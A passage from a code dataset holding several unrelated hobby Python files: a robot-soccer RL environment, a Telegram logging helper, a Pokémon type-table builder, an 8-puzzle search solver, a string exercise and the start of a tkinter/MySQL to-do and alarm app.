self.hfo.step()\n\t\t\t\t\tcurrentState = self.hfo.getState()\n\n\t\treturn resultingStatus\n\n\t# Defined reward for this environment\n\t# Add a -0.4 penalty if attacking agent occupies the same grid\n\t# as an attacking opponent. Also, give +1 for goal.\n\tdef get_reward(self, status, nextState):\n\t\ttotalReward = 0\n\t\tif status == GOAL:\n\t\t\ttotalReward += 1\n\n\t\tif nextState != \"GOAL\" and nextState != \"OUT_OF_BOUNDS\":\n\t\t\tfor index in range(1, len(nextState)):\n\t\t\t\tif nextState[0] == nextState[index]:\n\t\t\t\t\ttotalReward -= self.collisionPenalty\n\t\t\t\t\tbreak\n\n\t\treturn totalReward\n\t\t\n\n\t# Discretize the state representation given by the HFO environment.\n\t# Discretization is done to the locations of the ball and agents\n\tdef process_state(self, state):\n\t\tdiscretizedState = self.getDiscretizedLocation(state[0], state[1])\n\t\toffset = 10 + 6*self.numTeammates\n\n\t\tinfoList = [discretizedState]\n\t\tfor i in range(self.numOpponents):\n\t\t\toppoLocX = offset + 3*i\n\t\t\toppoLocY = offset + 3*i + 1\n\t\t\tinfoList.append(self.getDiscretizedLocation(state[oppoLocX],state[oppoLocY]))\n\t\treturn infoList\n\n\t# Method that serves as an interface between a script controlling the agent\n\t# and the environment. Method returns the nextState, reward, flag indicating\n\t# end of episode, and current status of the episode\n\n\tdef step(self, action_params):\n\t\tstatus, nextState = self.act(action_params)\n\t\tdone = (status!=IN_GAME)\n\t\treward = self.get_reward(status, nextState)\n\t\treturn self.curState, reward, done, status\n\n\t\t\n\tdef waste_one_episode(self):\n\t\tstatus = IN_GAME\n\t\twhile status == IN_GAME:\n\t\t\tself.hfo.act(DASH, 0, 0)\n\t\t\tstatus = self.hfo.step()\n\n\tdef waste_one_step(self):\n\t\tself.hfo.act(DASH, 0, 0)\n\t\tself.hfo.step()\n\n\tdef quitGame(self):\n\t\tself.hfo.act(QUIT)\n\n\t# For the first 150 iterations, reposition agents\n\t# to initial position\n\tdef initGame(self):\n\t\tframeCounters = 0\n\t\twhile frameCounters < 150:\n\t\t\tself.moveToInitLocs()\n\t\t\tframeCounters += 1\n\n\tdef readInitLocFinal(self):\n\t\tfilename = self.initFileLoc\n\t\tfile = open(filename, \"r\")\n\n\t\tself.initPositions = []\n\n\t\tfor line in file:\n\t\t\tepisodeOpponents = []\n\t\t\tlistPos = ast.literal_eval(line)\n\t\t\tfor index in range(self.numOpponents+1):\n\t\t\t\tif index == self.agentId:\n\t\t\t\t\tself.initPositions.append(listPos[index])\n\t\t\t\telse:\n\t\t\t\t\tepisodeOpponents.append(listPos[index])\n\t\t\tself.oppoPositions.append(episodeOpponents)\n\n\n\n\n\n\n\n\n","repo_name":"raharrasy/RL2019-BaseCodes","sub_path":"Exercise2/DiscreteHFO/HFOAttackingPlayer.py","file_name":"HFOAttackingPlayer.py","file_ext":"py","file_size_in_byte":9482,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"54"} +{"seq_id":"8649672247","text":"import datetime\nimport configuration\nimport telebot\n\nbot = telebot.TeleBot(configuration.token)\nnow = datetime.datetime.now()\n\ndef log(text, user_id, disco_id):\n print(\"------------------------------\")\n ndt = now.strftime(\"%d-%m-%Y %H:%M\")\n main_string = ndt + \"\\n\" + 'result: ' + text + \"\\n\"\n second_string = f\"telegram id: {user_id}, disco id: {disco_id}\"\n ready_string = main_string + second_string\n print(ready_string)\n print(\"------------------------------\")\n bot.send_message(321965003, ready_string)\n\n# log(\"123\", \"@keguser0\", \"321965003\", \"1645\")","repo_name":"heycarl/DiscoBot","sub_path":"log_functions.py","file_name":"log_functions.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40463898622","text":"import json\nfile_name = 'E:\\\\github\\\\NoneBot\\\\qbot\\\\src\\\\plugins\\\\pokemon\\\\table.txt'\nwith open(file_name, encoding='utf-8') as f:\n file_content = f.read()\n f.close()\ntable = file_content.split('\\n')\nfile_name = 'E:\\\\github\\\\NoneBot\\\\qbot\\\\datebase\\\\pokemon\\\\types.json'\nwith open(file_name, encoding='utf-8') as f:\n file_content = f.read()\n f.close()\ntypes_json = json.loads(file_content)\nfor i in range(18):\n effect_list = table[i].split('\\t')\n types_json[i]['effect_double'] = []\n types_json[i]['effect_half'] = []\n types_json[i]['effect_zero'] = []\n for j in range(18):\n if effect_list[j] == '2×':\n types_json[i]['effect_double'].append(types_json[j]['english'])\n if effect_list[j] == '1⁄2×':\n types_json[i]['effect_half'].append(types_json[j]['english'])\n if effect_list[j] == '0×':\n types_json[i]['effect_zero'].append(types_json[j]['english'])\n\nfile_name = 'E:\\\\github\\\\NoneBot\\\\qbot\\\\datebase\\\\pokemon\\\\types_with_effect.json'\nwith open(file_name, 'w', encoding='utf-8') as f:\n s = json.dumps(types_json, ensure_ascii=False)\n f.write(s)\nf.close()\n","repo_name":"NekoMashiro/water_spinach_bot","sub_path":"src/plugins/pokemon_model/create_effect_table.py","file_name":"create_effect_table.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"28788255025","text":"from queue import Queue, LifoQueue, PriorityQueue\nfrom heap_util import decrease_key\nfrom state import State\n\n\ndef solve(matrix, algorithm, prioritized=False, heuristic=None):\n # if prioritized and heuristic = None:\n # raise Exception('Error: cannot execute without heuristic!')\n # if not prioritized and heuristic is not None:\n # heuristic=None # ignore heuristic\n \n search_depth = 0 # stores the maximum depth reached by the applied algorithm\n \n frontier_list = frontier(algorithm)\n frontier_set = set() # for later search\n explored = set()\n start_state = State(matrix, heuristic=heuristic)\n if start_state.is_solvable():\n frontier_list.put(start_state)\n frontier_set.add(start_state)\n while not frontier_list.empty():\n current_state = frontier_list.get()\n frontier_set.remove(current_state)\n explored.add(current_state)\n \n search_depth = max(search_depth, current_state.cost)\n \n if current_state.is_goal_state():\n path = get_path(current_state)\n return path, cost(path), explored, search_depth\n next_states = current_state.generate_moves()\n for state in next_states:\n if state not in explored and state not in frontier_set:\n frontier_list.put(state)\n frontier_set.add(state)\n elif prioritized:\n if state in frontier_set:\n if decrease_key(frontier_list.queue, 0, frontier_list.queue.index(state), state):\n frontier_set.remove(state)\n frontier_set.add(state)\n else:\n path = LifoQueue()\n path.put(start_state)\n return path, cost(path), explored, search_depth\n\n'''\nCLEAN\n'''\n# specify container according to search algorithm\n\n\ndef frontier(algorithm):\n if algorithm == 'bfs':\n return Queue()\n elif algorithm == 'dfs':\n return LifoQueue()\n elif algorithm == 'a_star':\n return PriorityQueue()\n\n# retrieve path till the goal\n\n\ndef get_path(current_state):\n path = LifoQueue()\n path.put(current_state)\n while current_state.parent is not None:\n path.put(current_state.parent)\n current_state = current_state.parent\n return path\n\n# calculate the path cost\n\n\ndef cost(path):\n return len(path.queue) - 1\n\n\n\n","repo_name":"SalmaAwad/8-Puzzle-Game","sub_path":"puzzle_solver.py","file_name":"puzzle_solver.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32419588251","text":"# Write a Python program to change a given string to a new string where the first and last chars have been exchanged \n\n## Solution\n\nstring = \"manzoor\"\nstring_list = []\n\nfor cha in string: ## Convert string to list\n string_list.append(cha)\nstring_list[0], string_list[-1] = string_list[-1], string_list[0]\n\nstring = \"\"\nfor cha in string_list:\n string+=cha\nprint(string)\n\n## Solution 2\ndef change_sring(str1):\n return str1[-1:] + str1[1:-1] + str1[:1]\n \nprint(change_sring('abcd'))\nprint(change_sring('12345'))","repo_name":"ManzoorAhamed/python-200-problems","sub_path":"27-character-exchange/character-exchange.py","file_name":"character-exchange.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17468041011","text":"from tkinter import *\r\nfrom tkinter.messagebox import *\r\nfrom PIL import Image\r\nimport time\r\nimport winsound\r\nimport mysql.connector\r\nfrom tkinter import messagebox\r\nfrom datetime import datetime\r\n\r\nglobal c1\r\nglobal c2\r\nglobal c3\r\nglobal c4\r\nglobal c5\r\nglobal c6\r\nglobal secs_counter\r\nglobal mins_counter\r\nglobal hours_counter\r\nsecs_counter = 0\r\nmins_counter = 0\r\nhours_counter = 0\r\n\r\nmydb = mysql.connector.connect(\r\nhost = \"localhost\",\r\nuser = \"root\",\r\npassword = \"root\"\r\n)\r\nmy_cur = mydb.cursor()\r\nmy_cur.execute(\"Create database if not exists utility\")\r\nmy_cur.execute(\"use utility\")\r\nmy_cur.execute(\"Create table if not exists todo(note char(255))\")\r\nmy_cur.execute(\"Create table if not exists alarm(hr integer(11) , min integer(11))\")\r\nmydb.commit()\r\n####################################################################################################################################################################################\r\ndef alarm():\r\n def back11():\r\n alarm_frame.destroy()\r\n userText = False\r\n def userText1(event):\r\n alarm_entry_hr.delete(0 , END)\r\n usercheck = TRUE\r\n def userText2(event):\r\n alarm_entry_min.delete(0 , END)\r\n usercheck = TRUE\r\n def add_alarm(hr , min , alarm_frame):\r\n def alar(): \r\n freq = 1000\r\n dur = 500\r\n now = datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n my_cur.execute(\"Select * from alarm\")\r\n a1 = my_cur.fetchall()\r\n for i in a1:\r\n if(i[0] == datetime.now().hour and i[1] == datetime.now().minute):\r\n hr1 = str(i[0])\r\n min1 = str(i[1])\r\n for j in range(0, 4): \r\n winsound.Beep(freq, dur)\r\n my_cur.execute(\"Delete from alarm where hr = %s and min = %s \" %(hr1 , min1))\r\n mydb.commit()\r\n alarm_frame.destroy()\r\n \r\n time.sleep(1)\r\n alar()\r\n try:\r\n hr = int(hr)\r\n min = int(min)\r\n if(hr>24 or hr<0 or min>60 or min<0):\r\n messagebox.showwarning(\"Alert\" , \"Enter a valid time\")\r\n return\r\n my_cur.execute(\"Insert into alarm (hr , min) values ('%s' ,'%s')\" %(hr , min))\r\n mydb.commit()\r\n alar()\r\n\r\n except ValueError:\r\n messagebox.showwarning(\"ALert\" , \"Dont leave a field blank\")\r\n \r\n alarm_frame = Frame(c, bg = \"cyan\")\r\n alarm_frame.place(relx = 0, rely = 0.1 , relwidth = 1, relheight = 0.9)\r\n\r\n eg_label = Label(alarm_frame , text = \"Enter in 24 hr format eg.(23hr 20min)\")\r\n eg_label.pack()\r\n\r\n alarm_entry_hr = Entry(alarm_frame)\r\n alarm_entry_hr.insert(0 , \"Enter hr here\")\r\n alarm_entry_hr.bind(\"